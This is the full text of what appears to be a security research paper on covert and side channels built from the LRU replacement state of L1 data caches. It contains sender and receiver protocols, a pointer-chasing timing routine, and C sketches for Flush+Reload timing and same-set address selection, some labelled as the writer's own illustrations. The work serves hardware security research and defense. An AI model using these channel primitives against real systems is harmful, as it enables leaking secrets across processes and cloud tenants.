
Leaking Information Through Cache LRU States

The widely deployed Least-Recently Used (LRU) cache replacement policy and its variants are an essential component of modern processors. However, we show for the first time in detail that the LRU states of caches can be used to leak information. The LRU states are shared among all the software that accesses the cache and we show that timing-based channels are possible: any access to a cache by a sender will modify the LRU states, and the receiver is able to observe this through a timing measurement. This paper presents LRU timing-based channels both when the sender and the receiver have shared memory, e.g., shared library data pages, and when they are fully separate processes without shared memory. In addition, the new LRU timing-based channels are demonstrated on both Intel and AMD processors in scenarios where the sender and the receiver are sharing the cache in both hyper-threaded setting and time-sliced setting. The transmission rate of the new LRU channel can be up to 600Kbits/s per cache set in the hyper-threaded setting. Different from the existing cache channels which require the sender to have cache misses, the new LRU channels work with cache hits, making the channel faster and more stealthy as no cache misses are required for the sender. This paper also demonstrates that the new LRU channels can be used in transient execution attacks, e.g., Spectre, to retrieve the victim's secret. Further, this paper presents evaluation showing that the LRU channels also pose threats to existing secure cache designs. Possible defenses against the LRU timing-based channels are discussed and evaluated in simulation, with defense features added to protect the LRU states.


I Introduction

Side channels and covert channels in processors have been gaining renewed attention in recent years. Many of these channels leverage timing information, especially differences in the timing of operations that are affected by the processor state. To date, researchers have shown numerous timing-based channels in caches, e.g., [1, 2, 3, 4, 5, 6], as well as in other parts of the processor, such as the shared functional units in SMT processors, e.g., [7, 8, 9, 10, 11, 12, 13]. The canonical examples of timing channels are the channels in processor caches, where timing reveals information about the state of the processor cache. This in turn can be used to leak information such as cryptographic keys [14, 15, 16, 3, 17]. Many of the variants of the recent Spectre and Meltdown attacks also use covert channels in addition to transient execution to exfiltrate data [18, 19, 20].

All existing cache attacks in the peer-reviewed literature require a cache miss by the sender to replace some data in the cache; the miss (or lack thereof) causes a timing difference when a later access is made by the receiver. In contrast, this paper presents new cache timing-based channels that rely only on the sender making cache accesses, whether they are hits or misses.

In processors, the order in which cache lines are evicted depends on the cache's replacement policy and its state. Modern processors typically implement variants of the Least-Recently Used (LRU) policy, such as Tree-PLRU [21] or Bit-PLRU [22]. An LRU state is maintained for each cache set and is used to determine which cache line in the set should be replaced when a cache miss causes a replacement. The LRU state is updated on every cache access to record which cache line in the set was just accessed. Thus, both cache hits and misses in the set cause updates to the LRU state of the set.

One important feature of the new LRU timing-based channels is that, unlike all other cache timing-based side channels, the sender does not have to trigger a cache replacement (i.e., no data needs to be evicted from the cache). The LRU channel works even when the sender only triggers a cache hit, and the receiver later triggers a possible replacement to measure the time. This feature benefits transient execution attacks, as only a small speculation window is required for the attacker.

The new LRU timing-based channels are also a threat to many of the existing secure cache proposals. Numerous secure caches [23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33] have been presented, and they aim to either partition or randomize the victim's and the attacker's cache accesses to defend against cache timing-based side channels. However, most of the secure caches do not consider the LRU states and are vulnerable to the new LRU attack. This paper demonstrates the problems with LRU states, and fixes them, for the case of the well-known Partition-Locked (PL) cache [24].

In this paper, the new LRU timing-based channels are demonstrated and evaluated in-depth for the first time. The biggest challenge of the LRU channels is how the receiver can accurately observe which level of cache a memory access hits in – i.e., how to measure the timing precisely. This paper proposes to use dedicated data structures and a pointer chasing algorithm in the receiver’s program to allow for fine-grained measurements of the latency of memory accesses. Further, two algorithms are designed to build LRU timing channels both with and without shared memory between the sender and the receiver, making the LRU channels practical in a variety of attack scenarios. We evaluated the LRU channel on a number of commercial processors including Intel and AMD processors with different micro-architectures, and both hyper-threaded and time-sliced sharing settings are considered. The LRU channels are also demonstrated to be usable in a Spectre attack.

To mitigate the new LRU timing-based channels, a number of defenses are discussed and evaluated. Further, as an example, the secure PL cache design [24] is evaluated against the LRU channel and shown to be vulnerable through its LRU states. The design is then improved to defend against the LRU attacks and evaluated in simulation.

I-A Contributions

The contributions of this work are as follows:

  • The first detailed presentation of how the LRU states in caches can be used as timing-based side and covert channels for information leaks, both with and without shared memory between the sender and the receiver.

  • Detailed analysis and evaluation of a practical way to transfer information via the LRU channels. Evaluation of the transmission rates and bit error rates of the LRU covert channels on both Intel and AMD processors. Comparison of the LRU channels with the existing cache channels from the perspective of encoding time and cache miss rates.

  • Demonstration of how the LRU channels can be used in transient execution attacks.

  • Proposal for and evaluation of mitigations of the LRU channels, which can be applied to micro-architecture designs.

  • Demonstration of how the LRU channels break the security of PL cache [24], and how it can be fixed.

II Background

CPU caches leverage the temporal and spatial locality of memory accesses in programs to reduce memory access latency. Data blocks are stored in caches as cache lines. If data in a cache line is requested again, it is served faster. The set-associative cache is the most common cache structure, a design trade-off between performance and hardware complexity. In a set-associative cache, a cache line can only reside in the cache set its address maps to, and later only that cache set needs to be looked up for the cache line. An N-way set-associative cache has N entries in each cache set.

II-A Existing Timing-Based Cache Side and Covert Channels

Caches have been leveraged to build timing-based side and covert channels in processors. The cache side channels have been shown to enable attackers to steal secret keys across different security domains and across processor cores, e.g., [1, 2, 3, 4]. The recent Spectre, Meltdown, and their variants can use cache covert channels in transient execution [18, 19, 20], which poses a further risk to modern computers. Whether a cache line is in cache or not affects the timing of the cache operations, and different programs or threads can affect each other by accessing data in the same cache. Two examples of attacks are listed below:

Flush+Reload attack [1]: A cache line is first flushed out of the cache. Next, the sender accesses the cache line, or not, depending on the message to be sent, i.e., the sender has a cache miss to trigger a replacement (if accessed) or not (if not accessed). In the last step, the receiver accesses (i.e., reloads) the same cache line, and measures the time of the access. If the last access is a cache hit (small access latency), the receiver can infer that the sender accessed the line.
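As a concrete illustration (our own sketch, not code from the paper), the flush and reload steps of the receiver can be written with GCC/Clang x86 intrinsics roughly as follows; coarse rdtscp timing is sufficient here because a miss goes all the way to memory:

#include <stdint.h>
#include <x86intrin.h>

/* Flush the shared line out of all cache levels (receiver's first step). */
static void flush_line(uint8_t *shared) {
    _mm_clflush(shared);
    _mm_mfence();                        /* make sure the flush completes */
}

/* Reload the shared line and return the access latency in TSC ticks.
   A small latency (cache hit) means the sender accessed the line. */
static uint64_t reload_latency(uint8_t *shared) {
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    (void)*(volatile uint8_t *)shared;   /* the timed reload */
    uint64_t end = __rdtscp(&aux);
    return end - start;
}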

Prime+Probe attack [2]: First, the receiver occupies a whole cache set by accessing different cache lines mapping to the set. Next, the sender accesses a cache line in the set, or not, depending on the message to be sent, i.e., the sender again has a cache miss that triggers a replacement (if accessed) or not (if not accessed). In the last step, the receiver probes all the cache lines used in the first step, and measures the time of the accesses. If one of the accesses is a cache miss (large access latency), the receiver can infer that the sender accessed the cache set in the second step.

Many other attacks exist as well. They all, however, require a cache miss (or no access) to occur when the sender is sending information. In contrast, any cache access, whether a cache hit or a miss, can trigger the new LRU attack.

II-B Cache Replacement Policy

When a cache line is accessed but is not in the cache (i.e., a cache miss), the cache line will be fetched into the cache set. In this case, another cache line needs to be evicted from the cache set to make room for the incoming cache line. The replacement policy selects a cache way from the set to evict, known as the victim way. The replacement algorithm uses some state to store the history of accesses to the cache ways in a given set. There are a number of replacement algorithms, such as the random replacement policy, the First-In First-Out (FIFO) replacement policy, and the LRU replacement policy. Among them, in the L1 cache, the LRU policy and its variants are the most widely used because they give a high cache hit rate. In the last level cache (LLC), due to the reduced data locality, other replacement policies have been proposed [34].

LRU: The LRU algorithm keeps track of the age of cache lines, using log2(N) bits per cache line in an N-way cache to store the age of the line. If a cache replacement is needed on a cache miss, the least recently used cache way (i.e., the oldest way) is selected as the victim way and is evicted. The "true" LRU algorithm is expensive in terms of latency (to update the LRU states) and area (to store the age of all the cache lines). This makes it prohibitive when the cache associativity is greater than 4, so often a variant of Pseudo Least-Recently Used (PLRU) is used instead.

Tree-PLRU: Tree-PLRU [21] uses a binary tree structure to keep track of the cache access history in a cache set. For an N-way set-associative cache, the tree has N-1 nodes, each taking 1 bit, for a total of N-1 bits per cache set to store the access history of all the cache ways. Each tree node indicates whether the left sub-tree or the right sub-tree has been less recently used. To find the victim way, the replacement algorithm starts from the root and always goes to the less recently used child to find the leaf node that indicates the victim way. To update the Tree-PLRU state when a cache line in a way is accessed, all the nodes on the path from the root to the accessed way's leaf node are set to point to the child that is not an ancestor of the accessed cache way.
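The following minimal C sketch (our own illustration; the bit convention is one common choice, not necessarily what any particular processor implements) shows victim selection and state update for an 8-way Tree-PLRU set:

#include <stdio.h>

#define WAYS 8
static int tree[WAYS - 1];              /* 7 internal nodes, node 0 is the root;
                                           0 = left subtree is older, 1 = right */

/* Walk from the root toward the less recently used child to find the victim. */
static int plru_victim(void) {
    int node = 0;
    while (node < WAYS - 1)
        node = 2 * node + 1 + tree[node];   /* go left if 0, right if 1 */
    return node - (WAYS - 1);               /* leaf index -> way number */
}

/* On an access to `way`, set the bits on the root-to-leaf path so they
   point away from the accessed way (it becomes the most recently used). */
static void plru_touch(int way) {
    int node = 0;
    for (int level = WAYS / 2; level >= 1; level /= 2) {
        int go_right = (way & level) != 0;  /* which child leads to `way` */
        tree[node] = !go_right;             /* point to the other child */
        node = 2 * node + 1 + go_right;
    }
}

int main(void) {
    for (int i = 0; i < WAYS; i++) plru_touch(i);   /* fill ways 0..7 in order */
    printf("victim: way %d\n", plru_victim());      /* prints way 0 */
    plru_touch(0);                                  /* a hit on way 0 ... */
    printf("victim: way %d\n", plru_victim());      /* ... moves the victim away from 0 */
    return 0;
}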

Bit-PLRU: Bit-PLRU [22], also called Most Recently Used (MRU), uses one bit per cache way, called the MRU-bit, to store the history. For an N-way cache set, a total of N bits are required. When a way is accessed, its MRU-bit is set to 1, indicating the way was recently used. Once all the ways have their MRU-bit set to 1, all the MRU-bits are reset to 0. To find a victim, the way with the lowest index whose MRU-bit is 0 is chosen. The logic of Bit-PLRU is simpler than that of Tree-PLRU.
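A corresponding sketch of Bit-PLRU, following the description above (our own code; real implementations may differ in details such as how the reset is handled):

#include <stdint.h>

#define WAYS 8
static uint8_t mru[WAYS];            /* one MRU-bit per way */

static void bitplru_touch(int way) {
    mru[way] = 1;                    /* mark the accessed way as recently used */
    int all_set = 1;
    for (int i = 0; i < WAYS; i++)
        all_set &= mru[i];
    if (all_set)                     /* once every MRU-bit is 1 ... */
        for (int i = 0; i < WAYS; i++)
            mru[i] = 0;              /* ... reset all MRU-bits to 0 */
}

static int bitplru_victim(void) {
    for (int i = 0; i < WAYS; i++)
        if (mru[i] == 0)
            return i;                /* lowest-index way with MRU-bit 0 */
    return 0;                        /* unreachable: the reset always leaves a 0 bit */
}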

III Threat Model and Assumptions

Fig. 1: Cache organization and the steps of the LRU timing-based side or covert channel.

We assume set-associative caches and further assume the cache uses an LRU or PLRU replacement algorithm which evicts the least recently used cache line. Like all other side or covert channels, the LRU timing-based channel involves two parties: the sender and the receiver. Following techniques used in [35, 36], we assume the two processes can be co-located on the same core to share the L1 cache, as shown in Figure 1, either in an SMT machine as two hyper-threads running in parallel or as two threads time-sharing the core. Existing attacks show that sharing the same physical core is practical and poses real threats to computer systems, for example through side channels [9, 10, 11, 12, 13] or Spectre attacks leveraging the BTB or RSB [18, 37, 38]. The LRU states of the shared cache can be influenced (by the sender) and observed (by the receiver).

In this paper, we focus on the LRU states in the L1 cache. LRU channels in the other levels of caches are also possible.¹ Depending on the cache architecture, for the sender to update the LRU states of the lower levels of caches, a miss in the higher cache level is required, e.g., the sender's accesses that hit in the L1 or L2 caches will not change the replacement state in the LLC. In contrast, the L1 is directly accessed by the processor pipeline and the L1 LRU state is updated on every memory access. Thus, we focus on the L1 Data (L1D) cache.

¹Concurrently to this submission, a preprint paper [39] has recently been posted on arXiv on side channels that leverage the replacement policy in the LLC. This work is compared to the preprint in Section X.

If the sender is benign but happens to modify the LRU states based on some secret information, then this is an LRU side channel, and the sender is typically called the victim. If the sender is malicious, e.g., a small malicious software trojan in a protected domain is used to pass secret information out of the domain, then this is an LRU covert channel. In both cases, we assume the receiver can extract useful information about the memory access pattern of the sender from the LRU states.

IV LRU Timing-based Channels

The LRU timing-based channels leverage the LRU states of cache sets. In this section, we discuss how the LRU state in one cache set, referred to as the target set, can be used to transfer information. In practice, several sets can be used in parallel to increase the transmission rate or to reduce the noise.

As introduced in Section II-B, the LRU state for each set contains several bits, so in principle it is possible to transfer more than 1 bit per target set. However, because any access to the set changes the LRU state, we focus on letting the receiver measure the set only once. Specifically, the receiver observes the timing of one memory access, which can only have two results: a cache hit or a cache miss. Thus, at most one bit can be transferred per cache set at a time. To transfer information using an LRU channel, there are in general three phases:

Initialization Phase: First, a sequence of memory accesses is performed so that the LRU state is partially known to the receiver. In a covert channel, this step can be done by either the sender, receiver, or jointly. In a side channel, this step has to be done by the sender.

Encoding Phase: To send information, the sender accesses one or more memory locations mapping to the target set to change the LRU state. The pattern of memory accesses depends on the information to be sent. For example, in the protocols in Section IV-A and IV-B, the sender conducts one memory access depending on the 1-bit message to be sent.

Decoding Phase: The receiver first accesses one or more memory locations mapping to the target set to potentially trigger a cache replacement and cause a cache line to be evicted based on the LRU state. The receiver then observes the timing of accessing a memory location to learn whether the cache line was evicted, and thus infers the LRU state.

IV-A LRU Channel with Shared Memory

As shown in Algorithm 1, this is the first communication protocol which uses the LRU cache states in an N-way set-associative cache, and which assumes shared memory. Later, in Section IV-B, a protocol which does not require shared memory is presented. Both are designed to be light-weight in the encoding phase, where the sender only needs to perform at most one memory access.

line 0 – line N: N+1 different cache lines mapping to the target set
m: a 1-bit message to transfer on the channel
d: a parameter of the receiver

Receiver Operations:

// Step 0: Initialization Phase
for i = 0 to d do
        Access line i;
end for
sleep; // To allow the sender code to run here for encoding
// Step 2: Decoding Phase
for i = d+1 to N do
        Access line i;
end for
Access line 0 and time the access;

Sender Operations:

// Step 1: Encoding Phase
if m = 1 then
        Access line 0;
else
        Do not access line 0;
end if
Algorithm 1 LRU Channel with Shared Memory

The sender and the receiver first agree on the target cache set they will use to transfer information. We use line 0 – line N to denote N+1 different cache lines that map to the target set. This can be achieved by using data at different physical addresses with the same cache index bits but different tag bits. Note that line i here refers to a cache line at a certain physical address, not a specific cache entry; line i could be placed in any cache way in the set. Lines 0–N can be at any accessible addresses satisfying the above; the name does not imply a certain literal physical address i. In Algorithm 1, the sender and the receiver both need to use the same physical address (or a physical address within the same 64-byte cache line boundary) to access line 0 in the cache. This can be achieved by a memory location in a shared dynamically linked library, as in [1]. m is a 1-bit message to be sent. d is a parameter of the protocol that is chosen by the receiver.

In the initialization phase, the receiver first accesses cache lines 0 to d, in order to set the initial LRU state of the target set. Then, in the encoding phase, the sender either accesses line 0 or does not, depending on the message to be sent (in this paper, an access means transferring bit 1, no access means transferring bit 0). In the decoding phase, the receiver then accesses the other lines, d+1 to N. In total, the receiver accesses N+1 cache lines in the set. Thus, if the sender did not access line 0 in the encoding phase, line 0 will be evicted²; otherwise it will not, because its LRU position is set to the newest during the encoding phase. To check this, the receiver measures the time of accessing line 0 to test whether line 0 is still in the cache (due to the sender's access).

²With PLRU replacement algorithms, line 0 is not guaranteed to be evicted by this access sequence. However, as will be evaluated in Section IV-C, line 0 will be evicted in most cases.

For example, when N = 8 and d = 5, the sequence of memory accesses when sending m = 0 is as follows:

  • Init. Phase: 0, 1, 2, 3, 4, 5

  • Encoding Phase: no access

  • Decoding Phase: 6, 7, 8, then 0 (miss)

In this 8-way set-associative cache, line 0 is chosen by the LRU policy as the victim way and is evicted from L1 when line 8 is accessed, so the receiver observes an L1 miss when accessing line 0 at the end.

Meanwhile, the sequence of memory accesses when sending m = 1 is as follows:

  • Init. Phase: 0, 1, 2, 3, 4, 5

  • Encoding Phase: 0 (hit)

  • Decoding Phase: 6, 7, 8, then 0 (hit)

Here, line 0 stays in the cache the whole time: during the encoding phase, the access to line 0 makes it the newest line in the LRU state, so the remaining accesses in the decoding phase do not evict it. When the receiver measures the time of accessing line 0 in the decoding phase, the receiver observes an L1 cache hit and can infer that the sender sent m = 1.
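To make the protocol concrete, a minimal C sketch of the receiver side of Algorithm 1 is shown below (our own illustration; it assumes d = 5, that lines[0..8] point into a shared read-only page and all map to the target set, and that time_access() is a precise timer such as the pointer-chasing measurement of Section IV-D):

#include <stdint.h>

#define N 8                                  /* L1D associativity */
#define D 5                                  /* receiver's parameter d */

/* lines[0..N] all map to the target set; line 0 is the shared line.
   Returns the measured latency of line 0: a small value (L1 hit)
   decodes to m = 1, a large value (L1 miss) decodes to m = 0. */
uint64_t receive_one_bit(volatile uint8_t *lines[N + 1],
                         uint64_t (*time_access)(volatile uint8_t *)) {
    for (int i = 0; i <= D; i++)             /* Step 0: Initialization Phase */
        (void)*lines[i];

    /* sleep here so the sender's encoding phase (Step 1) can run */

    for (int i = D + 1; i <= N; i++)         /* Step 2: Decoding Phase */
        (void)*lines[i];

    return time_access(lines[0]);            /* time the final access to line 0 */
}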

IV-B LRU Channel without Shared Memory

line 0 – line N: N+1 different cache lines mapping to the target set
m: a 1-bit message to transfer on the channel
d: a parameter of the receiver

Receiver Operations:

// Step 0: Initialization Phase
for i = 0 to d do
        Access line i;
end for
sleep; // To allow the sender code to run here for encoding
// Step 2: Decoding Phase
for i = d+1 to N-1 do
        Access line i;
end for
Access line 0 and time the access;

Sender Operations:

// Step 1: Encoding Phase
if m = 1 then
        Access line N;
else
        Do not access the target set;
end if
Algorithm 2 LRU Channel without Shared Memory

The shared memory required between the sender and the receiver in Algorithm 1 is not always available. In Algorithm 2, the sender and the receiver do not need to access any shared memory location. The sender only accesses line N, while the receiver accesses lines 0 to N-1 in the target set.

Once the target set is decided, the sender and the receiver can map memory accesses to the target set by using proper virtual memory addresses in their own memory spaces. For performance, the L1 cache is usually virtually-indexed and physically-tagged (VIPT). For example, for an L1 cache with 64 sets and a cache line size of 64 bytes, bits 6–11 of the address decide the cache set. Since the lower 12 bits of the virtual address and the physical address are the same, the receiver can make sure lines 0 to N-1 map to the same set as line N by using memory locations whose virtual-address bits 6–11 are the same as those of line N.
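For illustration, the following C sketch (our own; the buffer layout and names are assumptions) picks addresses in the receiver's own buffer whose virtual-address bits 6–11 match the target set, so they map to the same L1D set on a 64-set cache with 64-byte lines:

#include <stdint.h>

#define LINE_SIZE  64
#define NUM_SETS   64
#define SET_STRIDE (LINE_SIZE * NUM_SETS)    /* 4 KiB between lines of one set */

static inline unsigned l1_set_index(uintptr_t va) {
    return (va >> 6) & (NUM_SETS - 1);       /* bits 6-11 select the set */
}

/* Fill out[0..n-1] with pointers into buf that all map to target_set.
   buf must span at least (n + 1) * SET_STRIDE bytes. */
void build_lines(uint8_t *buf, unsigned target_set,
                 volatile uint8_t **out, int n) {
    uintptr_t base  = (uintptr_t)buf;
    uintptr_t first = base +
        (uintptr_t)((target_set - l1_set_index(base)) & (NUM_SETS - 1)) * LINE_SIZE;
    for (int i = 0; i < n; i++)
        out[i] = (volatile uint8_t *)(first + (uintptr_t)i * SET_STRIDE);
}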

In Algorithm 2, in the initialization phase, the receiver first accesses cache lines 0 to d, in order to set the initial LRU state of the target set. Then, in the encoding phase, the sender accesses line N or does not, depending on the message to be sent (again, an access means m = 1 and no access means m = 0). In the decoding phase, the receiver accesses the other lines, d+1 to N-1. Thus, combining the initialization phase and the decoding phase, the receiver accesses N cache lines in total, just fitting in the cache set, which has N ways. If the sender accesses line N in the encoding phase, line 0 will be chosen as the victim by the LRU policy in the decoding phase and will be replaced by the cache line accessed by the receiver. Thus, if the receiver observes a longer timing when accessing line 0, he or she knows that the sender sent m = 1.

For example, when N = 8 and d = 5, the order of memory accesses when sending m = 0 is as follows:

  • Init. Phase: 0, 1, 2, 3, 4, 5

  • Encoding Phase: no access

  • Decoding Phase: 6, 7, then 0 (hit)

And the order of memory accesses when sending m = 1 is:

  • Init. Phase: 0, 1, 2, 3, 4, 5

  • Encoding Phase: 8 (hit, if line 8 is in the cache before the Init. Phase)

  • Decoding Phase: 6, 7, then 0 (miss)

Whether the sender accesses line 8 or not changes the LRU state, which in turn decides which line is evicted when a replacement occurs during the decoding phase. The receiver observes an L1 cache hit when accessing line 0 if the sender is sending 0, and an L1 cache miss if the sender is sending 1. Compared to Algorithm 1, there is more noise on this channel, as any thread accessing the target set can cause line 0 to be evicted: a miss on line 0 does not necessarily mean that the sender accessed line 8. The noise is due to the lack of shared memory, and other known cache side channel attacks without shared memory (e.g., the Prime+Probe channel [2]) have the same source of noise.

IV-C PLRU vs. LRU Replacement Policy

In true LRU, the least recently used way is always chosen as the victim. For example, consider the following two memory access sequences in an 8-way cache, with each number representing an access to a line mapping to the set:

  • Sequence 1 (access in order): 0, 1, 2, 3, 4, 5, 6, 7, 8.

  • Sequence 2 (access in order with random insertion): 0, (x), 1, (x), 2, (x), 3, (x), 4, (x), 5, (x), 6, (x), 7, (x). Here, line x is a cache line that maps to this cache set and is different from lines 0–7. The parentheses indicate that the access might or might not happen, and we assume line x will be accessed at least once.

If true LRU is used, line 0 will be evicted in both sequences. However, with PLRU, line 0 is not guaranteed to be evicted. Because PLRU uses fewer state bits to track the memory access history, the cache LRU state before the access sequence can still affect the choice of victim way, and a longer history should be considered when analyzing PLRU. Consider the following initial conditions before accessing the above sequences:

  • Random: The cache contains some of the lines 0–8, and possibly other lines, and the initial accessing order of these lines is random.

  • Sequential: The cache contains some of the lines 0–8, and possibly other lines, and the initial accesses to these lines were in sequential order (e.g., the previous accesses to the set were in order with random insertion, like Sequence 2).

Init. Cond.   Num. Loop Iter.   LRU (Seq. 1 & 2)   Tree-PLRU Seq. 1   Tree-PLRU Seq. 2   Bit-PLRU Seq. 1   Bit-PLRU Seq. 2
Random        1                 100%               50.4%              62.7%              38.5%             55.5%
Random        2                 100%               82.8%              65.6%              55.6%             69.7%
Random        3                 100%               99.2%              64.2%              67.3%             80.1%
Random        more              100%               100%               62%                100%              99%
Sequential    1                 100%               90.9%              75.6%              60.4%             61.0%
Sequential    2                 100%               100%               65.9%              63.0%             64.1%
Sequential    3                 100%               100%               64.0%              67.3%             70.3%
Sequential    more              100%               100%               62%                100%              99%
TABLE I: Probability of line 0 being evicted with PLRU

We implemented an in-house simulator to simulate the Tree-PLRU [21] and Bit-PLRU [22] replacement policies in an 8-way set. First, in a warm-up phase, we create accesses to the set for each of the two initial conditions. For the random initial condition, random access sequences are used. For the sequential initial condition, Sequence 2 is used, with line x being accessed at each parenthesis with a fixed probability. Then, Sequence 1 or Sequence 2 is accessed in a loop, and whether line 0 is in the cache after each sequence is recorded for each loop iteration. We repeat the above test in the simulator many times for each configuration, and present the results in Table I.

As shown in Table I, under random initial condition, line 0 might still be kept in the cache with a high probability. Meanwhile, sequential initial condition gives a high probability of line 0 being evicted after several loop iterations, especially for sequence 1 and the Bit-PLRU. Note that true LRU will always evict line 0.

In the above study, Sequence 1 is the access pattern of Algorithm 1 sending m = 0. Sequence 2 is the access pattern of Algorithm 2 sending m = 1 in hyper-threaded sharing, where x is line 8. In hyper-threaded sharing, the memory accesses by different processes interleave in a random order. A loop iteration corresponds to the receiver measuring in a loop while the sender is sending bits repeatedly. The random initial condition occurs when some process has been using the lines in a random order; the sequential initial condition occurs when the lines are always accessed in order. In the two proposed LRU channels, if line 0 is still in the cache when it should be evicted according to true LRU, it results in errors in the channel. The simulation results show that the sequential initial condition gives a higher eviction rate. Thus, the receiver should ensure the sequential initial condition by placing the lines it uses in its own address space and always accessing them in order.

IV-D Challenge: Measuring the Latency of L1 Hit and Miss

TABLE II: Latency of cache access (cycles)
Microarchitecture    L1D   L2
Intel Sandy Bridge   4-5   12
Intel Skylake        4-5   12
AMD Zen              4-5   17
rdtscp                 ; read time stamp counter (start)
movl %eax, %esi        ; save the low 32 bits of the start time
movq (%rbx), %rax      ; load 1: %rbx points to the head of the linked list
movq (%rax), %rax      ; load 2: each element stores the address of the next
movq (%rax), %rax      ; load 3
movq (%rax), %rax      ; load 4
movq (%rax), %rax      ; load 5
movq (%rax), %rax      ; load 6
movq (%rax), %rax      ; load 7
movq (%rax), %rax      ; load 8: the target address being measured
rdtscp                 ; read time stamp counter (end)
subl %esi, %eax        ; elapsed cycles = end - start
Fig. 2: Pointer chasing algorithm.

The major challenge for the receiver is to measure the memory access time precisely and to distinguish an L1 cache hit from an L1 cache miss (an L2 cache hit or longer). Table II shows the access latencies on the microarchitectures we tested: an L1 hit takes less than 5 CPU cycles, and an L2 hit takes about 10-20 CPU cycles. Due to the noise caused by serialization and the granularity of the time stamp counter, simply wrapping a single memory access with the rdtscp instruction (or rdtsc together with serializing instructions) cannot distinguish an L1 hit from an L2 hit; the measurement results of an L1 hit and an L2 hit are the same (shown in Appendix A).

Fig. 3: Histogram of access latencies of seven L1 hits and the 8th element being L1 hit or miss when measuring one target address with pointer chasing (left) on Intel Xeon E5-2690 and (right) on AMD EPYC 7571.

Thus, we propose to use a pointer chasing algorithm and a dedicated data structure to measure one memory access precisely. The pointer chasing algorithm in Figure 2 requires a linked list in which each element stores the address of the next element. In the code listed, %rbx points to the head of the linked list. Since the address used by each load depends on the data fetched by the previous load, all eight accesses are serialized. However, in a side or covert channel scenario, it is not practical for the receiver of Algorithm 1 to build a linked list containing the sender's memory access destination, which lies in a read-only shared library.

Instead of a linked list in the shared library, we use a linked list of 7 elements³ in the receiver's own memory space, and let the 7th element contain the memory address to be measured. In this way, when measuring latency with the pointer chasing algorithm in Figure 2, the code first accesses the 7 local elements and then the target address at the end, and measures the total time of the 8 serialized memory accesses. Before running the measurement, the receiver can fetch the first 7 local elements into the L1 cache, so the first 7 accesses always hit in L1 and the total time depends only on whether the 8th element is in the L1 cache or not. Figure 3 shows the result of this measurement strategy (L1 hits on the first 7 elements, and the 8th element being an L1 hit or miss). The difference between an L1 hit and an L1 miss of the 8th element is clearly distinguishable on the Intel processors. On the AMD processor, the latencies of an L1 hit and an L1 miss show different distributions. To avoid the first 7 elements polluting the LRU state of the target set, a further optimization is to put the 7 elements in one cache set and use any other set as the target set.

³The size of the linked list does not have to be 7. However, if the size is small, the noise from the time stamp counter reads will affect the measurements; if the size is large, there will be noise from accessing the elements in the linked list. 7 elements worked well in our experiments.
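A sketch of this measurement structure in C (our own illustration; a real receiver would also place the 7 elements in a non-target set and warm them into L1 before timing):

#include <stdint.h>
#include <x86intrin.h>

#define CHAIN_LEN 7

/* Each element fills its own 64-byte cache line and stores a pointer to the next. */
struct node { struct node *next; char pad[64 - sizeof(struct node *)]; };
static struct node chain[CHAIN_LEN] __attribute__((aligned(64)));

/* Link the 7 local elements and make the last one point at the target address. */
static void build_chain(void *target) {
    for (int i = 0; i < CHAIN_LEN - 1; i++)
        chain[i].next = &chain[i + 1];
    chain[CHAIN_LEN - 1].next = (struct node *)target;
}

/* Time 8 dependent loads: 7 warm local elements followed by the target.
   The total mostly reflects whether the target (8th load) hits in L1. */
static uint64_t time_chain(void) {
    unsigned aux;
    volatile struct node *p = &chain[0];
    uint64_t start = __rdtscp(&aux);
    for (int i = 0; i < CHAIN_LEN + 1; i++)
        p = p->next;                 /* each address depends on the previous load */
    uint64_t end = __rdtscp(&aux);
    (void)p;
    return end - start;
}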

V LRU Covert Channels in Intel Processors

m: k-bit message to be sent on the channel
t_s: sender's sending period (in cycles)
t_r: receiver's sampling period (in cycles)
TSC: current time stamp counter, obtained by rdtscp

Sender Code:

for each bit k of m do
        for an amount of time t_s do
               Step 1: Encoding Phase, encoding m[k]
        end for
end for

Receiver Code:

while True do
        Step 0: Initialization Phase
        while TSC < t_last + t_r do
               nothing;
        end while
        t_last = TSC
        Step 2: Decoding Phase
end while
Algorithm 3 Covert Channel Protocol
Model                   Intel Xeon E5-2690   Intel Xeon E3-1245 v5   AMD EPYC 7571*
Microarchitecture       Sandy Bridge         Skylake                 Zen
Number of cores         8                    4                       N/A
L1D size of each core   32KB                 32KB                    32KB
L1D associativity       8-way                8-way                   8-way
L1D number of sets      64                   64                      64
Frequency               3.8GHz               3.9GHz                  2.5GHz
OS                      Ubuntu 16.04.1       Ubuntu 16.04.1          Ubuntu 16.04.1
  • *We use the AMD processor on the Amazon AWS EC2 platform. The CPU model is specific to Amazon AWS. One core was leased for our experiments.

TABLE III: Specifications of the tested CPU models

To evaluate the transmission rate of the LRU channel, we evaluate it as a covert channel using one target set in the L1D cache. As shown in Algorithm 3, the sender sends each bit of the message for t_s CPU cycles, by running the sender's operations (in Algorithm 1 or 2) in a loop for t_s cycles for each bit of the message. t_s determines the transmission rate. We calculate the transmission rate as the total number of bits sent divided by the elapsed time measured in Linux. The receiver runs the receiver's operations (in Algorithm 1 or 2) every t_r CPU cycles in a loop and measures the latency using the pointer chasing approach discussed in Section IV-D.

In this section, the evaluation is conducted on the Intel Xeon E5-2690 and the Intel Xeon E3-1245 v5. The specifications of the tested CPU models are listed in Table III. We evaluated both the LRU channel with shared memory and the LRU channel without shared memory presented in Section IV, under both hyper-threaded sharing and time-sliced sharing settings.

V-A LRU Channels in Hyper-Threaded Sharing

For the hyper-threading case, we tested the covert channel when the sender and the receiver are sharing the same physical core as two hyper-threads. Each of the sender and the receiver is a process (i.e., a separate program) in Linux.

Fig. 4: Transmission error rate (evaluated by edit distance) as a function of the transmission rate (different t_s) for different d on Intel Xeon E5-2690 using (top) Algorithm 1 and (bottom) Algorithm 2.
Fig. 5: Example sequences of the receiver's observations when the sender is sending 0 and 1 alternately on Intel Xeon E5-2690 with a transmission rate of 480Kbps, using (top) Algorithm 1 and (bottom) Algorithm 2. The blue dots show the latencies observed by the receiver, and the red dotted line shows the threshold of an L1 cache hit.

